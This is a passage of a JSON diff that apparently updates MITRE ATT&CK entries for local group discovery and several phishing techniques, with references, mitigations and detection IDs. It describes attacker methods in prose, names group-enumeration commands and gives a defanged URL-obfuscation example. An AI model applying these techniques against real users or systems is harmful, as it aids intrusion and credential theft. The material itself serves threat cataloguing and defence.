+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0360: Behavioral Detection of Domain Group Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-12 19:29:21.013000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Local Groups",
+                    "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1069/001",
+                            "external_id": "T1069.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Harshal Tupsamudre, Qualys",
+                        "Miriam Wiesner, @miriamxyra, Microsoft Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:10.014000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0114: Behavioral Detection of Local Group Enumeration Across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-02 18:45:07.892000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Phishing",
+                    "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., \"thread hijacking\").(Citation: phishing-krebs)\n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1566",
+                            "external_id": "T1566"
+                        },
+                        {
+                            "source_name": "phishing-krebs",
+                            "description": "Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That Prey on Your Curiosity. Retrieved September 27, 2024.",
+                            "url": "https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/"
+                        },
+                        {
+                            "source_name": "CISA Remote Monitoring and Management Software",
+                            "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"
+                        },
+                        {
+                            "source_name": "cyberproof-double-bounce",
+                            "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.",
+                            "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
+                        },
+                        {
+                            "source_name": "Unit42 Luna Moth",
+                            "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"
+                        },
+                        {
+                            "source_name": "Microsoft OAuth Spam 2022",
+                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
+                        },
+                        {
+                            "source_name": "sygnia Luna Month",
+                            "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.",
+                            "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"
+                        },
+                        {
+                            "source_name": "Proofpoint-spoof",
+                            "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.",
+                            "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 VBA Infostealer 2014",
+                            "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Philip Winther",
+                        "Ohad Zaidenberg, @ohad_mz",
+                        "Liora Itkin",
+                        "Liran Ravich, CardinalOps",
+                        "Scott Cook, Capital One"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-17 16:14:54.713000+00:00\"}}}",
+                    "previous_version": "2.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0070: Detection Strategy for Phishing across platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-02 19:05:18.137000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Spearphishing Attachment",
+                    "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1566/001",
+                            "external_id": "T1566.001"
+                        },
+                        {
+                            "source_name": "ACSC Email Spoofing",
+                            "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"
+                        },
+                        {
+                            "source_name": "Unit 42 DarkHydrus July 2018",
+                            "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+                        },
+                        {
+                            "source_name": "Microsoft Anti Spoofing",
+                            "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Elastic - Koadiac Detection with EQL",
+                            "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024.",
+                            "url": "https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Philip Winther"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:35.522000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0236: Detection Strategy for Spearphishing Attachment across OS Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-02 19:15:44.182000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Spearphishing Link",
+                    "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing/spearphishing campaigns to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications.(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as \u201cdevice code phishing,\u201d an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1566/002",
+                            "external_id": "T1566.002"
+                        },
+                        {
+                            "source_name": "ACSC Email Spoofing",
+                            "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"
+                        },
+                        {
+                            "source_name": "CISA IDN ST05-016",
+                            "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016"
+                        },
+                        {
+                            "source_name": "Trend Micro Pawn Storm OAuth 2017",
+                            "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks"
+                        },
+                        {
+                            "source_name": "Netskope Device Code Phishing 2021",
+                            "description": "Jenko Hwong. (2021, August 10). New Phishing Attacks Exploiting OAuth Authorization Flows (Part 1). Retrieved March 19, 2024.",
+                            "url": "https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1"
+                        },
+                        {
+                            "source_name": "Microsoft OAuth 2.0 Consent Phishing 2021",
+                            "description": "Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.",
+                            "url": "https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/"
+                        },
+                        {
+                            "source_name": "Microsoft Anti Spoofing",
+                            "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Mandiant URL Obfuscation 2023",
+                            "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"
+                        },
+                        {
+                            "source_name": "Optiv Device Code Phishing 2021",
+                            "description": "Optiv. (2021, August 17). Microsoft 365 OAuth Device Code Flow and Phishing. Retrieved March 19, 2024.",
+                            "url": "https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing"
+                        },
+                        {
+                            "source_name": "SecureWorks Device Code Phishing 2021",
+                            "description": "SecureWorks Counter Threat Unit Research Team. (2021, June 3). OAuth\u2019S Device Code Flow Abused in Phishing Attacks. Retrieved March 19, 2024.",
+                            "url": "https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Philip Winther",
+                        "Shailesh Tiwary (Indian Army)",
+                        "Mark Wee",
+                        "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
+                        "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
+                        "Kobi Haimovich, CardinalOps",
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:34.123000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1021: Restrict Web-Based Content",
+                            "M1047: Audit",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0107: Detection Strategy for Spearphishing Links"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-07 21:50:08.827000+00:00",
+                    "modified": "2026-05-12 15:12:00.711000+00:00",
+                    "name": "Spearphishing Voice",
+                    "description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1566/004",
+                            "external_id": "T1566.004"
+                        },
+                        {
+                            "source_name": "CISA Remote Monitoring and Management Software",
+                            "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a"
+                        },
+                        {
+                            "source_name": "Unit42 Luna Moth",
+                            "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/"
+                        },
+                        {
+                            "source_name": "sygnia Luna Month",
+                            "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.",
+                            "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams"
+                        },
+                        {
+                            "source_name": "Proofpoint Vishing",
+                            "description": "Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.",
+                            "url": "https://www.proofpoint.com/us/threat-reference/vishing"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows",
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.711000+00:00\", \"old_value\": \"2026-04-17 16:04:48.737000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0245: Detection Strategy for Spearphishing Voice across OS platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 17:07:01.502000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Phishing for Information",
+                    "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1598",
+                            "external_id": "T1598"
+                        },
+                        {
+                            "source_name": "Avertium callback phishing",
+                            "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.",
+                            "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"
+                        },
+                        {
+                            "source_name": "TrendMictro Phishing",
+                            "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
+                        },
+                        {
+                            "source_name": "Sophos Attachment",
+                            "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020.",
+                            "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/"
+                        },
+                        {
+                            "source_name": "cyberproof-double-bounce",
+                            "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.",
+                            "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
+                        },
+                        {
+                            "source_name": "PCMag FakeLogin",
+                            "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.",
+                            "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages"
+                        },
+                        {
+                            "source_name": "Microsoft OAuth Spam 2022",
+                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
+                        },
+                        {
+                            "source_name": "ThreatPost Social Media Phishing",
+                            "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.",
+                            "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/"
+                        },
+                        {
+                            "source_name": "Proofpoint-spoof",
+                            "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.",
+                            "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"
+                        },
+                        {
+                            "source_name": "GitHub Phishery",
+                            "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.",
+                            "url": "https://github.com/ryhanson/phishery"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 VBA Infostealer 2014",
+                            "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
